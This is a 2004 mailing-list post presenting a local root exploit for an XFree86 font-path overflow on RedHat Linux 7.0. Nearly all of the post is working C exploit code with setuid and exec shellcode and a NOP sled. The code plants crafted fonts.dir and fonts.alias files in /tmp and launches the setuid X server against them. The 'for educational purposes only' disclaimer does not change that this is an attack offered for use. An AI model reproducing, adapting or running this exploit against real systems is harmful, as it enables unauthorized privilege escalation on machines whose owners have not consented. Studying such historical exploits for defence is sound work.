XFree86 vulnerability exploit
Hello
Below you can find a exploit for latest bug in XFree86 sofware.
Tested on some versions of RedHat Linux (mainly 7.0).
regards
Bender
/* For educational purposes only */
/* Brought to you by bender2@xxxxxxxxxxxx 11.10.2004 */
#include <fcntl.h>
#define NOPNUM 8000
#define ADRNUM 1058
/* shellcode from LSD */
char setuidcode[]= /* 8 bytes */
"\x33\xc0" /* xorl %eax,%eax */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xb0\x17" /* movb $0x17,%al */
"\xcd\x80" /* int $0x80 */
;
char shellcode[]= /* 24 bytes */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//id" /* pushl $0x68732f2f */
"\x68""/tmp" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
char jump[]=
"\x8b\xc4" /* movl %esp,%eax */
"\xc3" /* ret */
;
main(int argc,char **argv){
char buffer[20000],adr[4],pch[4],*b,*envp[4];
int i,fd;
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000;
envp[0]=&buffer[2000];
envp[1]=0;
printf("adr: 0x%x\n",adr+12000);
b=buffer;
strcpy(buffer,"1\n");
strcat(buffer,"aaaa.pcf
-aaaa-fixed-small-a-semicondensed--1-1-1-1-a-1-iso1111-1\n");
fd=open("/tmp/fonts.dir",O_CREAT|O_WRONLY,0666);
write(fd,buffer,strlen(buffer));
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b++='\n';
fd=open("/tmp/fonts.alias",O_CREAT|O_WRONLY,0666);
write(fd,buffer,strlen(buffer));
close(fd);
b=&buffer[2000];
for(i=0;i<NOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++)
*b++=0x90;
for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/bin/X11/X","X",":0","-fp","/tmp",0,envp);
}
--
bender2@xxxxxxxxxxxxxxxx
SDF Public Access UNIX System - http://sdf.lonestar.org